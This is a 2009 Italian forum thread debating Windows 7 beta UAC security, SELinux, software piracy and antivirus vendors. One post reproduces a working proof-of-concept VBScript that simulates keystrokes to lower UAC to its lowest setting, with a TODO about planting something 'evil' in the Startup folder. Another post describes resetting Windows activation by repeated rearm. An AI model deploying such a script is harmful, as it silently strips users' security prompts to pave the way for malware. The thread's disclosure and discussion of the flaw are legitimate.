|
|||||||
|
|
|
 |
|
|
Strumenti |
30-01-2009, 16:16
|
#101 | |
|
Senior Member
Iscritto dal: Nov 2001
Città: Cagliari
Messaggi: 1134
|
Quote:
Se ci pensiamo il Linux con Security-Enhanced Linux va ben oltre: http://en.wikipedia.org/wiki/Selinux ..quello si che è ultra configurabile e serio. P.S. http://www.nsa.gov/research/selinux/index.shtml Aprite gli occhi e guardate oltre l'UAC..che Microsoft non ha inventato nulla. Ultima modifica di xsim : 30-01-2009 alle 16:21. |
|
|
|
|
30-01-2009, 16:17
|
#102 | ||
|
Bannato
Iscritto dal: Sep 2008
Messaggi: 7603
|
Long Zheng proporrebbe una soluzione al problema, sebbene non al 100% (ma non lo sarà mai, a questo punto, credo) http://www.istartedsomething.com/200...-7-beta-proof/ :
Quote:
Quote:
|
||
|
|
|
|
30-01-2009, 16:20
|
#103 | |
|
Bannato
Iscritto dal: Feb 2008
Messaggi: 4046
|
Quote:
Con VISTA la Microsoft è passata alla fase 2 di una strategia, tra l'altro dichiarata.. e questo ha dato fastidio a molti. Scordiamoci che i veri nuovi sistemi operativi a 64bit Microsoft siano facilmente craccabili come lo era XP.. è finita tale fase.. potranno essere aggirati, utilizzati in parte... ma mai pienamente. E per pienamente intendo un sistema che si aggiorna quotidianamente sotto tutti i profili ed in particolare sotto il profilo sicurezza.  Un sistema non aggiornato, non serve a nulla e a nessuno e fa solo danni a chi lo usa e anche a tutti gli altri utenti di internet. E a mio modo di vedere, sono proprio questi "gli utonti"  .. che paradossalmente sono quelli che danno degli utonti agli altri. 
|
|
|
|
|
|
30-01-2009, 16:25
|
#104 | |
|
Senior Member
Iscritto dal: Nov 2001
Città: Cagliari
Messaggi: 1134
|
Quote:
Personalmente non mi tange perchè le licenze OEM le pago poco..ma è così..tanta protezione..ma soltanto sulla carta. Ultima modifica di xsim : 30-01-2009 alle 16:28. |
|
|
|
|
|
30-01-2009, 16:27
|
#105 | |
|
Bannato
Iscritto dal: Feb 2008
Messaggi: 4046
|
Quote:
|
|
|
|
|
|
30-01-2009, 16:31
|
#106 | |
|
Senior Member
Iscritto dal: Nov 2001
Città: Cagliari
Messaggi: 1134
|
Quote:
Cosa non recepita da tutti, me ne rendo conto. |
|
|
|
|
|
30-01-2009, 16:32
|
#107 | |
|
Messaggi: n/a
|
Quote:
recentemente ho acquisato una OEM di xp PER POCHI € (scippata da un pc arrotato ..LOL), e l'ho installata .ASSIEME A LINUX.. i sistemi che si scaricano da intenert, sono sostanzialmente le versioni UFFICIALI, rilsaciate da MS stessa...(SOPRATUTTO QUELLE IN ENG ESCONO DAI SERVER DI REDMOND ), tutto sta nel metodo di hacking (che poi con vista non è neppure necessario, QUA ms SI È PROPRIO SUPERATA...PUR DI AUMENTARE LA DIFFUSIONE)...BASTA UN BANALE REARM (procedura DETTAGLIATAMENTE DESCRITTA DA LORO STESSI)... E USARE UN SISTEMA DECISAMENTE pulito e che si scarica la qualunque dai siti MS stessi... 190 gg e si ricomincia senza INSOZZARE NULLA... CON SEVEN SI SUPERANO ANCORA BEN 5 REARM DA SHELL SENZA FORMATTARE....E POI SI LAMENTANO DELLA PIRATERIA EH! Ora sappiamo bene tutti che se MS attuasse delle vere politiche DI ANTIPIRATERIA, AD USARLO SAREBBERO DAVVERO 4 GATTI e sappiamo bene che il suo maggiore introito deriva dall'imposizione che attua dal boom de pc nelle grandi catene...(inizio anni 2000 le oem erano PRESSOCCHÈ SCONOSCIUTE E SI ANDAVA IN BUONA PARTE DI COPIA TAROCCA direttamente alla fonte) altresì PERÒ sappiamo bene che in uffcio NON è ammissibile avere copie NON regolari, di qualunque sw...e sappiamo bene che un free in ambito commercile NON vale (NON Open, free che è tutt'altro...) E QUI ms guadagna fior di €€€€€ o $$$$ in licenze win+ office...UAC: idea brillante, implementata bene ma che ha fatto innervosire chi ASSIEME AD MS MANGIA NELLO STESSO PIATTO DEI PC ASSEMBLATI... cHI, BEH SEMPLICE, i lecchini che producono sw per la "sicurezza".. Chi non ricorda quando questi si sono ribellati come bambini a cui han tolto la caramella di bocca (caramella che fa rima in questo caso $$$$$) perchè i loro sw NOn servivano o andavano alla raz de gan...? Le varie Mcafee, Norton (queste vanno a braccetto con i prodduttori di pc e con MS ossia ormai un pc senza windows e un av in versione trial, sia mai...., come se fosse un player...non lo trovi) e tante altre sw house di sicurezza...campano solo grazie a MS, alla sua capillare diffusione massificata e variegata e ad accordi lobbistici di basso fondo...
Ultima modifica di userpercaso : 30-01-2009 alle 16:43. |
|
|
|
|
30-01-2009, 16:37
|
#108 | |
|
Bannato
Iscritto dal: Feb 2008
Messaggi: 4046
|
Quote:
E non viene percepito nemmeno, se non in termini negativi, che solo Mamma e Papà sanno come è fatta la propria creatura e nessun altro. E i vari crack che ci sono in giro o che ci saranno in giro.. non ti garantiscono proprio per niente.. ti illudi di farla franca o pensi di farla franca.. ma NON ne hai e NON ne puoi avere LA SICUREZZA. E Mamma Microsoft in questo è stata abbastanza generosa probabilmente anche per un proprio tornaconto, ma non è detto che lo sarà altrettanto in futuro... un futuro che, almeno a parole, è già stato annunciato con VISTA. |
|
|
|
|
|
30-01-2009, 16:38
|
#109 | |
|
Senior Member
Iscritto dal: Jun 2007
Città: Amiga Nation
Messaggi: 15567
|
Quote:
Non per questo mi pare corretto sminuire la sicurezza di Vista solo perché dici "già visto"... 2. sottovaluti ampiamente la capacità di sicurezza dei sistemi Windows NT che estendono con Vista e gli Integrity Levels ulteriormente il controllo minuzioso sui singoli oggetti (!!!!), e non limitatamente al FS (tutto sotto Unix è un FS come sappiamo...). Ciò permette livelli di sicurezza, a configurarli, di una finezza rara con le ACL etc. etc.... Leggi pure questa interessante discussione (soprattutto i commenti): http://aovestdipaperino.com/posts/do-you-sudowin.aspx
__________________
 ASUS ROG SCAR 18 G834JY (i9-13980HX, 32GB DDR5@5600MHz, 4090 16GB 256bit 175W), 18" res: 2560x1600 240Hz con G-Sync. Amiga forever!
|
|
|
|
|
|
30-01-2009, 16:40
|
#110 |
|
Senior Member
Iscritto dal: May 2001
Messaggi: 12966
|
La falla se vogliamo non è di UAC, ma è by design di Windows purtroppo (o per fortuna di qualcuno) per via delle troppe Hooks alle DLL disponibili al programmatore.
Cioè tenete conto che per fare un keylogger ci sono parecchi modi possibili sotto Windows, poiché si hanno oltre che le chiamate di sistema, anche le DirectX. Microsoft dovrebbe pensare seriamente a sfoltire le molte chiamate di sistema spesso pericolose. Lo ripeto, il problema non è di UAC. Questo è il codice in vbscript: Codice:
'// 1337H4x Written by _____________
'// (12 year old)
Set WshShell = WScript.CreateObject("WScript.Shell")
'// Toggle Start menu
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)
'// Search for UAC applet
WshShell.SendKeys("change uac")
WScript.Sleep(2000)
'// Open the applet (assuming second result)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)
'// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
'// Save our changes
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")
'// TODO: Add code to handle installation of rebound
'// process to continue exploitation, i.e. place something
'// evil in Startup folder
'// Reboot the system
'// WshShell.Run "shutdown /r /f"
PS: vi consiglio di associare i file script tipo questo (.vbs) a programmi come notepad .
Ultima modifica di WarDuck : 30-01-2009 alle 16:45. |
|
|
|
|
30-01-2009, 16:46
|
#111 | |
|
Senior Member
Iscritto dal: Jun 2007
Città: Amiga Nation
Messaggi: 15567
|
Quote:
È da debellare questa falsa idea di sicurezza che i produttori di AV falsamente instillano negli utenti! Gli AV non servono a un 8=>, o quasi, se alla base c'è un attento uso dei permessi. Peccato che in questo secondo caso è gratis e insito nel kernel di un OS quindi non ci farebbero soldi a dire la verità  Molto meglio far credere all'utonto che è importantissimo installare un AV e che ti protegge da ogni virus o malware, quando non è così. Senza questa falsa campagna di sicurezza, oggi non avremmo tutta questa diffusione di malware e PC zombie che avviene tipicamente per contagio del classico XP usato da amministratore, ma con un buon AV installato (mi raccomando! ) e che esegue ogni tipo di crack e porcheria che circola, tanto si sente protetto...Nessuno però critica questo atteggiamento e invece molti criticano UAC perché dà una "falsa sicurezza" secondo loro, che ipocrisia... 
__________________
ASUS ROG SCAR 18 G834JY (i9-13980HX, 32GB DDR5@5600MHz, 4090 16GB 256bit 175W), 18" res: 2560x1600 240Hz con G-Sync. Amiga forever!
Ultima modifica di hexaae : 30-01-2009 alle 16:51. |
|
|
|
|
|
30-01-2009, 16:49
|
#112 | |
|
Bannato
Iscritto dal: Feb 2008
Messaggi: 4046
|
Quote:
Oggi saranno i 4 gatti che non utilizzeranno un sistema se non craccato e non i rimanenti 96. E la Microsoft ha già previsto di rinunciare a 'sti quatto gatti ..non gli cambia niente, anzi e bene che riduca la sua quota di mercato lasciando al proprio destino la marginalità e puntando sempre di più alla qualità e in nome anche di una maggiore sicurezza dei suoi SO.O veramente pensi che non sono capaci !? |
|
|
|
|
|
30-01-2009, 16:55
|
#113 |
|
Senior Member
Iscritto dal: May 2001
Messaggi: 12966
|
Cmq avendo provato lo script è una cosa impressionante, aggiungo che cmq l'Active Center segnala la cosa... chiaramente in quei millisecondi un programma maligno potrebbe fare di tutto.
D'altro canto credo che in realtà sia possibile da fixare, al contrario da quanto si dice, perché basterebbe fare in modo di chiedere l'autorizzazione almeno per cambiare le impostazioni di UAC. |
|
|
|
|
30-01-2009, 16:58
|
#114 | |
|
Bannato
Iscritto dal: Feb 2008
Messaggi: 4046
|
Quote:
|
|
|
|
|
|
30-01-2009, 16:59
|
#115 | |
|
Senior Member
Iscritto dal: Jun 2007
Città: Amiga Nation
Messaggi: 15567
|
Quote:
? Almeno però fate in modo che ci sia un avvertimento di sistema per certe modifiche assolutamente critiche e/o lasciate l'UAC forzato per tali scelte.Qualcuno lo suggerisca tramite i feedback per Win7.
__________________
ASUS ROG SCAR 18 G834JY (i9-13980HX, 32GB DDR5@5600MHz, 4090 16GB 256bit 175W), 18" res: 2560x1600 240Hz con G-Sync. Amiga forever!
Ultima modifica di hexaae : 30-01-2009 alle 17:15. |
|
|
|
|
|
30-01-2009, 17:02
|
#116 | |
|
Senior Member
Iscritto dal: May 2001
Messaggi: 12966
|
Quote:
http://www.withinwindows.com/2009/01...ays-microsoft/ Questo è lo script: http://www.withinwindows.com/files/uac/poc.vbs.txt Per sicurezza è stato rinominato in file di testo, basta togliere l'estensione txt e diventa uno script Visual Basic. Cmq non so se sia possibile mascherare gli input in modo tale che l'utente non se ne accorga. Edit: aggiungo che potenzialmente un utonto anche al massimo livello di protezione potrebbe sempre inserire la password anche se gli si sono aperte le finestre da sole .
|
|
|
|
|
|
30-01-2009, 17:20
|
#117 | |
|
Senior Member
Iscritto dal: Oct 2005
Messaggi: 2106
|
Quote:
|
|
|
|
|
|
30-01-2009, 17:25
|
#118 | |
|
Senior Member
Iscritto dal: Oct 2005
Messaggi: 2106
|
Quote:
Ahh, com'è difficile per molti ammettere di aver sbagliato o semplicemente di non sapere una cosa. Ultima modifica di acitre : 30-01-2009 alle 17:30. |
|
|
|
|
|
30-01-2009, 17:26
|
#119 | |
|
Senior Member
Iscritto dal: Nov 2001
Città: Cagliari
Messaggi: 1134
|
Quote:
Mica è una competizione (con tanto di premio al più esperto)..ma una discussione. Questo sfugge a molti che frequentano i forum..fra i quali forse (e dico forse) ci sei anche tu. Maggior relax..meno culi stretti. |
|
|
|
|
|
30-01-2009, 17:29
|
#120 | |
|
Senior Member
Iscritto dal: Nov 2001
Città: Cagliari
Messaggi: 1134
|
Quote:
Forza! |
|
|
|
|
|
|
| Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 19:22.
